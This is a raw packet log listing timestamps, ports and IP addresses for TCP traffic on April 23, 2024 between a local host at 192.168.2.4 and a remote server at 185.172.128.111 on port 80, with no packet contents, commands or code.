Apr 23, 2024 09:27:08.523123026 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.523139954 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.523160934 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.523197889 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.523235083 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.523268938 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.523304939 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.523350954 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.523372889 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.523372889 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.523372889 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.523372889 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.523372889 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.523372889 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.523386955 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.523413897 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.523423910 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.523431063 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.523459911 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.523473024 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.523495913 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.523511887 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.523533106 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.523547888 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.523570061 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.523583889 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.523607016 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.523617983 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.523644924 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.523652077 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.523693085 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.524944067 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.524981976 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.525016069 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.525036097 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.525551081 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.525588989 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.525609970 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.525624990 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.525635958 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.525664091 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.525674105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.525712013 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.525733948 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.525769949 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.525784016 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.525805950 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.525816917 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.525844097 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.525862932 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.525880098 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.525892019 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.525918007 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.525934935 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.525953054 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.525965929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.525990009 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.526001930 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.526026011 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.526038885 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.526062965 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.526074886 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.526099920 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.526113033 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.526137114 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.526149988 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.526174068 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.526190042 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.526211977 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.526226044 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.526247978 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.526262999 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.526283979 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.526302099 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.526319981 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.526330948 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.526355982 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.526370049 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.526392937 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.526413918 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.526428938 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.526438951 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.526472092 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.572385073 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.572463036 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.572527885 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.572566986 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.572602987 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.572639942 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.572675943 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.572675943 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.572675943 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.572675943 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.572710037 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.572712898 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.572720051 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.572748899 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.572783947 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.572818995 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.572854996 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.572890997 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.572962999 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.572962999 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.572962999 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.572962999 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.572962999 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.572963953 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.628010035 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.628072977 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.628082037 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.628127098 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.628144026 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.628181934 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.628221035 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.628257990 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.628297091 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.628331900 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.628341913 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.628341913 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.628341913 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.628341913 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.628341913 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.628370047 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.628381014 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.628407001 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.628417015 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.628448009 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.628456116 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.628487110 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.628509045 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.628523111 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.628532887 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.628561020 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.628568888 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.628597021 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.628606081 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.628634930 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.628648043 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.628674984 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.628685951 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.628711939 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.628721952 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.628750086 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.628761053 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.628787041 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.628798008 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.628824949 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.628834009 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.628864050 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.628873110 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.628901005 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.628911972 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.628937960 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.628950119 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.628974915 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.628984928 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.629012108 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.629040003 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.629051924 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.629062891 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.629091978 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.629101992 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.629139900 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.635624886 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.635664940 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.635684967 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.635721922 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.679536104 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.679579973 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.679615021 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.679617882 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.679647923 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.679656029 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.679658890 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.679696083 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.679713011 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.679733038 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.679744959 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.679769993 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.679780006 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.679810047 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.679819107 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.679847002 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.679861069 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.679884911 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.679899931 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.679920912 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.679934978 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.679956913 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.679968119 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.679996014 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.680017948 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.680032015 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.680047989 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.680068016 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.680078983 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.680126905 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.680133104 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.680165052 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.680203915 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.680218935 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.680241108 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.680253983 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.680278063 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.680303097 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.680313110 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.680321932 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.680350065 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.680363894 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.680387020 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.680408955 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.680438995 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.680443048 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.680480957 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.680491924 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.680516958 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.680530071 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.680552959 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.680576086 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.680612087 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.680629969 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.680648088 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.680663109 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.680685997 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.680699110 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.680722952 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.680744886 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.680759907 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.680782080 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.680798054 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.680820942 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.680836916 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.680855989 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.680872917 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.680896997 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.680910110 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.680932999 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.680946112 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.680958033 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.680984974 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.680994034 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.681021929 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.681036949 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.681060076 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.681071043 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.681097984 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.681113005 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.681134939 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.681144953 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.681180000 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.681185007 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.681219101 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.681226969 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.681289911 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.930541992 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.136765957 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.239054918 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.239104033 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.239119053 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.239137888 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.239156008 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.239171982 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.239187956 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.239340067 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.239341021 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.239367962 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.239428043 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.239433050 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.239447117 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.239495993 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.239495993 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.289470911 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.289505005 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.289524078 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.289606094 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.289623976 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.289639950 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.289722919 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.289722919 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.289724112 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.289724112 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.289724112 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.290071964 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.290091038 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.290110111 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.290240049 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.290240049 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.290240049 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.290431976 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.290451050 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.290466070 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.290482044 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.290481091 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.290510893 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.290510893 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.290534019 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.290749073 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.290766001 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.290781975 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.290914059 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.290914059 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.290914059 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.291065931 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.291084051 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.291100025 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.291124105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.291124105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.291167021 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.340205908 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.340270996 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.340311050 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.340357065 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.340393066 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.340429068 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.340560913 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.340562105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.340562105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.340562105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.340562105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.340562105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.340770006 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.340806961 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.340823889 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.340843916 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.340852022 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.340888023 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.340991020 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.341047049 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.341079950 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.341115952 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.341130018 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.341152906 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.341185093 CEST	49730	80	192.168.2.4	185.172.128.111
